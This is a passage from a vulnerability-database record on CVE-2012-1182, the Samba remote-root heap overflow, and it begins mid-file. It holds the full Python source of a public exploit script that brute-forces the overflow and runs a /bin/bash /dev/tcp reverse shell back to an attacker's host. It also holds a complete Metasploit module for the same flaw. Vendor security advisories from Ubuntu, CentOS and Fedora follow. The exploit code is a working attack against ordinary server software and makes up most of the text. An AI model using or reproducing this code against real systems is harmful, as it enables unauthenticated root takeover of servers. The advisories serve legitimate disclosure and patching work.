printable)) \nreturn ''.join(result) \n \n \nsploitshake = [ \n# HELLO \n\"8100004420434b4644454e4543464445\" + \\ \n\"46464346474546464343414341434143\" + \\ \n\"41434143410020454745424644464545\" + \\ \n\"43455046494341434143414341434143\" + \\ \n\"4143414341414100\", \n \n# NTLM_NEGOT \n\"0000002fff534d427200000000000000\" + \\ \n\"00000000000000000000000000001d14\" + \\ \n\"00000000000c00024e54204c4d20302e\" + \\ \n\"313200\", \n \n# SESSION_SETUP \n\"0000004bff534d427300000000080000\" + \\ \n\"000000000000000000000000ffff1d14\" + \\ \n\"000000000dff000000ffff02001d1499\" + \\ \n\"1f00000000000000000000010000000e\" + \\ \n\"000000706f736978007079736d6200\", \n \n# TREE_CONNECT \n\"00000044ff534d427500000000080000\" + \\ \n\"000000000000000000000000ffff1d14\" + \\ \n\"6400000004ff00000000000100190000\" + \\ \n\"5c5c2a534d425345525645525c495043\" + \\ \n\"24003f3f3f3f3f00\", \n \n# NT_CREATE \n\"00000059ff534d42a200000000180100\" + \\ \n\"00000000000000000000000001001d14\" + \\ \n\"6400000018ff00000000050016000000\" + \\ \n\"000000009f0102000000000000000000\" + \\ \n\"00000000030000000100000040000000\" + \\ \n\"020000000306005c73616d7200\" \n] \n \npwnsauce = { \n'smb_bind': \\ \n\"00000092ff534d422500000000000100\" + \\ \n\"00000000000000000000000001001d14\" + \\ \n\"6400000010000048000004e0ff000000\" + \\ \n\"0000000000000000004a0048004a0002\" + \\ \n\"002600babe4f005c504950455c000500\" + \\ \n\"0b03100000004800000001000000b810\" + \\ \n\"b8100000000001000000000001007857\" + \\ \n\"34123412cdabef000123456789ab0000\" + \\ \n\"0000045d888aeb1cc9119fe808002b10\" + \\ \n\"486002000000\", \n \n'data_chunk': \\ \n\"000010efff534d422f00000000180000\" + \\ \n\"00000000000000000000000001001d14\" + \\ \n\"640000000eff000000babe00000000ff\" + \\ \n\"0000000800b0100000b0103f00000000\" + \\ \n\"00b0100500000110000000b010000001\" + \\ \n\"0000009810000000000800\", \n \n'final_chunk': \\ \n\"000009a3ff534d422f00000000180000\" + \\ \n\"00000000000000000000000001001d14\" + \\ \n\"640000000eff000000babe00000000ff\" + \\ \n\"00000008006409000064093f00000000\" + \\ \n\"00640905000002100000006409000001\" + \\ \n\"0000004c09000000000800\" \n} \n \n \ndef exploit(host, port, cbhost, cbport, target): \nglobal sploitshake, pwnsauce \n \nchunk_size = 4248 \n \ntarget_tcp = (host, port) \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect(target_tcp) \n \nn = 0 \nfor pkt in sploitshake: \ns.send(unhexlify(pkt)) \npkt_res = s.recv(rs) \nn = n+1 \n \nfid = hexlify(pkt_res[0x2a] + pkt_res[0x2b]) \n \ns.send(unhexlify(pwnsauce['smb_bind'].replace(\"babe\", fid))) \npkt_res = s.recv(rs) \n \nbuf = \"X\"*20 # policy handle \nlevel = 2 #LSA_POLICY_INFO_AUDIT_EVENTS \nbuf+=struct.pack('<H',level) # level \nbuf+=struct.pack('<H',level)# level2 \nbuf+=struct.pack('<L',1)#auditing_mode \nbuf+=struct.pack('<L',1)#ptr \nbuf+=struct.pack('<L',100000) # r->count \nbuf+=struct.pack('<L',20) # array_size \nbuf+=struct.pack('<L',0) \nbuf+=struct.pack('<L',100) \n \nbuf += (\"A\" * target['chunk_offset']) \n \nbuf+=struct.pack(\"I\", 0); \nbuf+=struct.pack(\"I\", target['system_libc_offset']); \nbuf+=struct.pack(\"I\", 0); \nbuf+=struct.pack(\"I\", target['system_libc_offset']); \nbuf+=struct.pack(\"I\", 0xe8150c70); \nbuf+=\"AAAABBBB\" \n \ncmd = \";;;;/bin/bash -c '/bin/bash 0</dev/tcp/\"+cbhost+\"/\"+cbport+\" 1>&0 2>&0' &\\x00\" \n \ntmp = cmd*(816/len(cmd)) \ntmp += \"\\x00\"*(816-len(tmp)) \n \nbuf+=tmp \nbuf+=\"A\"*(37192-target['chunk_offset']) \nbuf+='z'*(100000 - (28000 + 10000)) \n \nbuf_chunks = [buf[x:x+chunk_size] for x in xrange(0, len(buf), chunk_size)] \nn=0 \n \nfor chunk in buf_chunks: \nif len(chunk) != chunk_size: \n#print \"LAST CHUNK #%d\" % n \nbb = unhexlify(pwnsauce['final_chunk'].replace(\"babe\", fid)) + chunk \ns.send(bb) \nelse: \n#print \"CHUNK #%d\" % n \nbb = unhexlify(pwnsauce['data_chunk'].replace(\"babe\", fid)) + chunk \ns.send(bb) \nretbuf = s.recv(rs) \nn=n+1 \n \ns.close() \n \nclass connectback_shell(SocketServer.BaseRequestHandler): \ndef handle(self): \nglobal do_brute \n \nprint \"\\n[!] connectback shell from %s\" % self.client_address[0] \ndo_brute = False \n \ns = self.request \n \nimport termios, tty, select, os \nold_settings = termios.tcgetattr(0) \ntry: \ntty.setcbreak(0) \nc = True \nwhile c: \nfor i in select.select([0, s.fileno()], [], [], 0)[0]: \nc = os.read(i, 1024) \nif c: \nif i == 0: \nos.write(1, c) \n \nos.write(s.fileno() if i == 0 else 1, c) \nexcept KeyboardInterrupt: pass \nfinally: termios.tcsetattr(0, termios.TCSADRAIN, old_settings) \n \nreturn \n \n \nclass ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): \npass \n \n \nif len(sys.argv) != 6: \nprint \"\\n {*} samba 3.x remote root by kd(eax)@ireleaseyourohdayfuckyou {*}\\n\" \nprint \" usage: %s <targethost> <targetport> <myip> <myport> <target>\\n\" % (sys.argv[0]) \nprint \" targets:\" \ni = 0 \nfor target in targets: \nprint \" %02d) %s\" % (i, target['name']) \ni = i+1 \n \nprint \"\" \nsys.exit(-1) \n \n \ntarget = targets[int(sys.argv[5])] \n \nserver = ThreadedTCPServer((sys.argv[3], int(sys.argv[4])), connectback_shell) \nserver_thread = threading.Thread(target=server.serve_forever) \nserver_thread.daemon = True \nserver_thread.start() \n \nwhile do_brute == True: \nsys.stdout.write(\"\\r{+} TRYING EIP=\\x1b[31m0x%08x\\x1b[0m OFFSET=\\x1b[32m0x%08x\\x1b[0m\" % (target['system_libc_offset'], target['chunk_offset'])) \nsys.stdout.flush() \nexploit(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], target) \n \nif \"finder\" in target: \ntarget['chunk_offset'] += 4 \nelse: \ntarget['system_libc_offset'] += 0x1000 \n \n \nif \"finder\" in target: \nprint \\ \n\"{!} found \\x1b[32mNEW\\x1b[0m target: chunk_offset = ~%d, \" \\ \n\"system_libc_offset = 0x%03x\" % \\ \n(target['chunk_offset'], target['system_libc_offset'] & 0xff000fff) \n \nwhile 1: \ntime.sleep(999) \n \nserver.shutdown() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/116843/samba3-exec.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:25:21", "description": "", "cvss3": {}, "published": "2012-09-28T00:00:00", "type": "packetstorm", "title": "Samba SetInformationPolicy AuditEventsInfo Heap Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-09-28T00:00:00", "id": "PACKETSTORM:116953", "href": "https://packetstormsecurity.com/files/116953/Samba-SetInformationPolicy-AuditEventsInfo-Heap-Overflow.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::DCERPC \ninclude Msf::Exploit::Remote::SMB \ninclude Msf::Exploit::Brute \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Samba SetInformationPolicy AuditEventsInfo Heap Overflow', \n'Description' => %q{ \nThis module triggers a vulnerability in the LSA RPC service of the Samba daemon \nbecause of an error on the PIDL auto-generated code. Making a specially crafted \ncall to SetInformationPolicy to set a PolicyAuditEventsInformation allows to \ntrigger a heap overflow and finally execute arbitrary code with root privileges. \n \nThe module uses brute force to guess the system() address and redirect flow there \nin order to bypass NX. The start and stop addresses for brute forcing have been \ncalculated empirically. On the other hand the module provides the StartBrute and \nStopBrute which allow the user to configure his own addresses. \n}, \n'Author' => \n[ \n'Unknown', # Vulnerability discovery \n'blasty', # Exploit \n'sinn3r', # Metasploit module \n'juan vazquez' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2012-1182'], \n['OSVDB', '81303'], \n['BID', '52973'], \n['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-069/'] \n], \n'Privileged' => true, \n'Payload' => \n{ \n'DisableNops' => true, \n'Space' => 811, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic bash telnet python perl', \n} \n}, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Targets' => \n[ \n# gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk '{ print $2 }'` <<< `echo -e \"print system\"` | grep '$1' \n['2:3.5.11~dfsg-1ubuntu2 and 2:3.5.8~dfsg-1ubuntu2 on Ubuntu 11.10', \n{ \n'Offset' => 0x11c0, \n'Bruteforce' => \n{ \n# The start for the final version should be 0xb20 aligned, and then step 0x1000. \n'Start' => { 'Ret' => 0x00230b20 }, \n'Stop' => { 'Ret' => 0x22a00b20 }, \n'Step' => 0x1000, \n} \n} \n], \n['2:3.5.8~dfsg-1ubuntu2 and 2:3.5.4~dfsg-1ubuntu8 on Ubuntu 11.04', \n{ \n'Offset' => 0x11c0, \n'Bruteforce' => \n{ \n# The start should be 0x950 aligned, and then step 0x1000. \n'Start' => { 'Ret' => 0x00230950 }, \n'Stop' => { 'Ret' => 0x22a00950 }, \n'Step' => 0x1000, \n} \n} \n], \n['2:3.5.4~dfsg-1ubuntu8 on Ubuntu 10.10', \n{ \n'Offset' => 0x11c0, \n'Bruteforce' => \n{ \n# The start should be 0x680 aligned, and then step 0x1000. \n'Start' => { 'Ret' => 0x00230680 }, \n'Stop' => { 'Ret' => 0x22a00680 }, \n'Step' => 0x1000, \n} \n} \n] \n], \n'DisclosureDate' => 'Apr 10 2012', \n'DefaultTarget' => 0, \n)) \n \nregister_options([ \nOptInt.new(\"StartBrute\", [ false, \"Start Address For Brute Forcing\" ]), \nOptInt.new(\"StopBrute\", [ false, \"Stop Address For Brute Forcing\" ]) \n], self.class) \n \nend \n \ndef exploit \nif target.bruteforce? \nbf = target.bruteforce \n \nif datastore['StartBrute'] and datastore['StartBrute'] > 0 \nbf.start_addresses['Ret'] = datastore['StartBrute'] \nend \n \nif datastore['StopBrute'] and datastore['StopBrute'] > 0 \nbf.stop_addresses['Ret'] = datastore['StopBrute'] \nend \n \nif bf.start_addresses['Ret'] > bf.stop_addresses['Ret'] \nraise ArgumentError, \"StartBrute should not be larger than StopBrute\" \nend \nend \nsuper \nend \n \ndef check \nbegin \nconnect() \nsmb_login() \ndisconnect() \n \nversion = smb_peer_lm().scan(/Samba (\\d\\.\\d.\\d*)/).flatten[0] \nminor = version.scan(/\\.(\\d*)$/).flatten[0].to_i \nprint_status(\"Version found: #{version}\") \n \nreturn Exploit::CheckCode::Appears if version =~ /^3\\.4/ and minor < 16 \nreturn Exploit::CheckCode::Appears if version =~ /^3\\.5/ and minor < 14 \nreturn Exploit::CheckCode::Appears if version =~ /^3\\.6/ and minor < 4 \n \nreturn Exploit::CheckCode::Safe \n \nrescue ::Exception \nreturn CheckCode::Unknown \nend \nend \n \ndef brute_exploit(target_addrs) \n \nprint_status(\"Trying to exploit Samba with address 0x%.8x...\" % target_addrs['Ret']) \ndatastore['DCERPC::fake_bind_multi'] = false \ndatastore['DCERPC::max_frag_size'] = 4248 \n \npipe = \"lsarpc\" \n \nprint_status(\"Connecting to the SMB service...\") \nconnect() \nprint_status(\"Login to the SMB service...\") \nsmb_login() \n \nhandle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', [\"\\\\#{pipe}\"]) \nprint_status(\"Binding to #{handle} ...\") \ndcerpc_bind(handle) \nprint_status(\"Bound to #{handle} ...\") \n \nstub = \"X\" * 20 \n \ncmd = \";;;;\" # padding \ncmd << \"#{payload.encoded}\\x00\" # system argument \ntmp = cmd * (816/cmd.length) \ntmp << \"\\x00\"*(816-tmp.length) \n \nstub << NDR.short(2) # level \nstub << NDR.short(2) # level 2 \nstub << NDR.long(1) # auditing mode \nstub << NDR.long(1) # ptr \nstub << NDR.long(100000) # r-> count \nstub << NDR.long(20) # array size \nstub << NDR.long(0) \nstub << NDR.long(100) \nstub << rand_text_alpha(target['Offset']) \n# Crafted talloc chunk \nstub << 'A' * 8 # next, prev \nstub << NDR.long(0) + NDR.long(0) # parent, child \nstub << NDR.long(0) # refs \nstub << NDR.long(target_addrs['Ret']) # destructor # will become EIP \nstub << NDR.long(0) # name \nstub << \"AAAA\" # size \nstub << NDR.long(0xe8150c70) # flags \nstub << \"AAAABBBB\" \nstub << tmp # pointer to tmp+4 in $esp \nstub << rand_text(32632) \nstub << rand_text(62000) \n \nprint_status(\"Calling the vulnerable function...\") \n \nbegin \ncall(dcerpc, 0x08, stub) \nrescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError \nprint_status('Server did not respond, this is expected') \nrescue Rex::Proto::DCERPC::Exceptions::Fault \nprint_error('Server is most likely patched...') \nrescue => e \nif e.to_s =~ /STATUS_PIPE_DISCONNECTED/ \nprint_status('Server disconnected, this is expected') \nend \nend \n \nhandler \ndisconnect \nend \n \n# Perform a DCE/RPC Function Call \ndef call(dcerpc, function, data, do_recv = true) \n \nfrag_size = data.length \nif dcerpc.options['frag_size'] \nfrag_size = dcerpc.options['frag_size'] \nend \nobject_id = '' \nif dcerpc.options['object_call'] \nobject_id = dcerpc.handle.uuid[0] \nend \nif options['random_object_id'] \nobject_id = Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16)) \nend \n \ncall_packets = make_request(function, data, frag_size, dcerpc.context, object_id) \ncall_packets.each { |packet| \nwrite(dcerpc, packet) \n} \n \nreturn true if not do_recv \n \nraw_response = '' \n \nbegin \nraw_response = dcerpc.read() \nrescue ::EOFError \nraise Rex::Proto::DCERPC::Exceptions::NoResponse \nend \n \nif (raw_response == nil or raw_response.length == 0) \nraise Rex::Proto::DCERPC::Exceptions::NoResponse \nend \n \n \ndcerpc.last_response = Rex::Proto::DCERPC::Response.new(raw_response) \n \nif dcerpc.last_response.type == 3 \ne = Rex::Proto::DCERPC::Exceptions::Fault.new \ne.fault = dcerpc.last_response.status \nraise e \nend \n \ndcerpc.last_response.stub_data \nend \n \n# Used to create standard DCERPC REQUEST packet(s) \ndef make_request(opnum=0, data=\"\", size=data.length, ctx=0, object_id = '') \n \nopnum = opnum.to_i \nsize = size.to_i \nctx = ctx.to_i \n \nchunks, frags = [], [] \nptr = 0 \n \n# Break the request into fragments of 'size' bytes \nwhile ptr < data.length \nchunks.push( data[ ptr, size ] ) \nptr += size \nend \n \n# Process requests with no stub data \nif chunks.length == 0 \nfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(3, opnum, '', ctx, object_id) ) \nreturn frags \nend \n \n# Process requests with only one fragment \nif chunks.length == 1 \nfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(3, opnum, chunks[0], ctx, object_id) ) \nreturn frags \nend \n \n# Create the first fragment of the request \nfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(1, opnum, chunks.shift, ctx, object_id) ) \n \n# Create all of the middle fragments \nwhile chunks.length != 1 \nfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(0, opnum, chunks.shift, ctx, object_id) ) \nend \n \n# Create the last fragment of the request \nfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(2, opnum, chunks.shift, ctx, object_id) ) \n \nreturn frags \nend \n \n# Write data to the underlying socket \ndef write(dcerpc, data) \ndcerpc.socket.write(data) \ndata.length \nend \n \nend \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/116953/setinfopolicy_heap.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2022-01-04T13:06:17", "description": "Brian Gorenc discovered that Samba incorrectly calculated array bounds when \nhandling remote procedure calls (RPC) over the network. A remote, \nunauthenticated attacker could exploit this to execute arbitrary code as the \nroot user. (CVE-2012-1182)\n", "cvss3": {}, "published": "2012-04-13T00:00:00", "type": "ubuntu", "title": "Samba vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-13T00:00:00", "id": "USN-1423-1", "href": "https://ubuntu.com/security/notices/USN-1423-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2022-02-27T11:54:44", "description": "**CentOS Errata and Security Advisory** CESA-2013:0515\n\n\nThe openchange packages provide libraries to access Microsoft Exchange\nservers using native protocols. Evolution-MAPI uses these libraries to\nintegrate the Evolution PIM application with Microsoft Exchange servers.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler. As OpenChange uses code generated by PIDL, this could have\nresulted in buffer overflows in the way OpenChange handles RPC calls. With\nthis update, the code has been generated with an updated version of PIDL to\ncorrect this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0, which\nprovides a number of bug fixes and enhancements over the previous version,\nincluding support for the rebased samba4 packages and several API changes.\n(BZ#767672, BZ#767678)\n\nThis update also fixes the following bugs:\n\n* When the user tried to modify a meeting with one required attendee and\nhimself as the organizer, a segmentation fault occurred in the memcpy()\nfunction. Consequently, the evolution-data-server application terminated\nunexpectedly with a segmentation fault. This bug has been fixed and\nevolution-data-server no longer crashes in the described scenario.\n(BZ#680061)\n\n* Prior to this update, OpenChange 1.0 was unable to send messages with\na large message body or with extensive attachment. This was caused by minor\nissues in OpenChange's exchange.idl definitions. This bug has been fixed\nand OpenChange now sends extensive messages without complications.\n(BZ#870405)\n\nAll users of openchange are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2013-March/056239.html\nhttps://lists.centos.org/pipermail/centos-announce/2013-March/056372.html\nhttps://lists.centos.org/pipermail/centos-cr-announce/2013-February/013398.html\nhttps://lists.centos.org/pipermail/centos-cr-announce/2013-February/013534.html\n\n**Affected packages:**\nevolution-mapi\nevolution-mapi-devel\nopenchange\nopenchange-client\nopenchange-devel\nopenchange-devel-docs\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2013:0515", "cvss3": {}, "published": "2013-02-27T19:34:43", "type": "centos", "title": "evolution, openchange security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2013-03-09T00:42:10", "id": "CESA-2013:0515", "href": "https://lists.centos.org/pipermail/centos-cr-announce/2013-February/013398.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-27T11:55:42", "description": "**CentOS Errata and Security Advisory** CESA-2012:0466\n\n\nSamba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\nto generate code to handle RPC calls, resulted in multiple buffer overflows\nin Samba. A remote, unauthenticated attacker could send a specially-crafted\nRPC request that would cause the Samba daemon (smbd) to crash or, possibly,\nexecute arbitrary code with the privileges of the root user.\n(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing this\nupdate, the smb service will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2012-April/055480.html\n\n**Affected packages:**\nsamba3x\nsamba3x-client\nsamba3x-common\nsamba3x-doc\nsamba3x-domainjoin-gui\nsamba3x-swat\nsamba3x-winbind\nsamba3x-winbind-devel\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2012:0466", "cvss3": {}, "published": "2012-04-10T21:13:02", "type": "centos", "title": "samba3x security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-10T21:13:02", "id": "CESA-2012:0466", "href": "https://lists.centos.org/pipermail/centos-announce/2012-April/055480.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-27T11:54:49", "description": "**CentOS Errata and Security Advisory** CESA-2013:0506\n\n\nSamba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. This could result in\ncode generated by the PIDL compiler to not sufficiently protect against\nbuffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0, which\nprovides a number of bug fixes and enhancements over the previous version.\nIn particular, improved interoperability with Active Directory (AD)\ndomains. SSSD now uses the libndr-krb5pac library to parse the Privilege\nAttribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client library,\nis included as a Technology Preview. This functionality and server\nlibraries, is included as a Technology Preview. This functionality uses the\nlibndr-nbt library to prepare Connection-less Lightweight Directory Access\nProtocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local Security\nAuthority (LSA) and Net Logon services to allow verification of trust\nfrom a Windows system. Because the Cross Realm Kerberos Trust functionality\nis considered a Technology Preview, selected samba4 components are\nconsidered to be a Technology Preview. For more information on which Samba\npackages are considered a Technology Preview, refer to Table 5.1, \"Samba4\nPackage Support\" in the Release Notes, linked to from the References.\n(BZ#766333, BZ#882188)\n\nThis update also fixes the following bug:\n\n* Prior to this update, if the Active Directory (AD) server was rebooted,\nWinbind sometimes failed to reconnect when requested by \"wbinfo -n\" or\n\"wbinfo -s\" commands. Consequently, looking up users using the wbinfo tool\nfailed. This update applies upstream patches to fix this problem and now\nlooking up a Security Identifier (SID) for a username, or a username for a\ngiven SID, works as expected after a domain controller is rebooted.\n(BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\nEnterprise Linux 6.4 and you have Samba in use, you should make sure that\nyou uninstall the package named \"samba4\" to avoid conflicts during the\nupgrade.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2013-March/056417.html\nhttps://lists.centos.org/pipermail/centos-cr-announce/2013-February/013579.html\n\n**Affected packages:**\nsamba4\nsamba4-client\nsamba4-common\nsamba4-dc\nsamba4-dc-libs\nsamba4-devel\nsamba4-libs\nsamba4-pidl\nsamba4-python\nsamba4-swat\nsamba4-test\nsamba4-winbind\nsamba4-winbind-clients\nsamba4-winbind-krb5-locator\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2013:0506", "cvss3": {}, "published": "2013-02-27T19:38:13", "type": "centos", "title": "samba4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2013-03-09T00:42:54", "id": "CESA-2013:0506", "href": "https://lists.centos.org/pipermail/centos-cr-announce/2013-February/013579.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-27T11:55:42", "description": "**CentOS Errata and Security Advisory** CESA-2012:0465\n\n\nSamba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\nto generate code to handle RPC calls, resulted in multiple buffer overflows\nin Samba. A remote, unauthenticated attacker could send a specially-crafted\nRPC request that would cause the Samba daemon (smbd) to crash or, possibly,\nexecute arbitrary code with the privileges of the root user.\n(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing this\nupdate, the smb service will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2012-April/055481.html\nhttps://lists.centos.org/pipermail/centos-announce/2012-April/055484.html\n\n**Affected packages:**\nlibsmbclient\nlibsmbclient-devel\nsamba\nsamba-client\nsamba-common\nsamba-doc\nsamba-domainjoin-gui\nsamba-swat\nsamba-winbind\nsamba-winbind-clients\nsamba-winbind-devel\nsamba-winbind-krb5-locator\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2012:0465", "cvss3": {}, "published": "2012-04-10T21:30:27", "type": "centos", "title": "libsmbclient, samba security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-10T23:59:51", "id": "CESA-2012:0465", "href": "https://lists.centos.org/pipermail/centos-announce/2012-April/055481.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "description": " Samba 4 is the ambitious next version of the Samba suite that is being developed in parallel to the stable 3.0 series. The main emphasis in this branch is support for the Active Directory logon protocols used by Windows 2000 and above. ", "edition": 2, "cvss3": {}, "published": "2012-05-15T23:28:34", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: samba4-4.0.0-38.alpha16.fc16", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-05-15T23:28:34", "id": "FEDORA:7D08020F24", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:50", "description": " Samba 4 is the ambitious next version of the Samba suite that is being developed in parallel to the stable 3.0 series. The main emphasis in this branch is support for the Active Directory logon protocols used by Windows 2000 and above. ", "edition": 2, "cvss3": {}, "published": "2012-05-03T07:32:37", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: samba4-4.0.0-26.alpha11.fc15.6", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 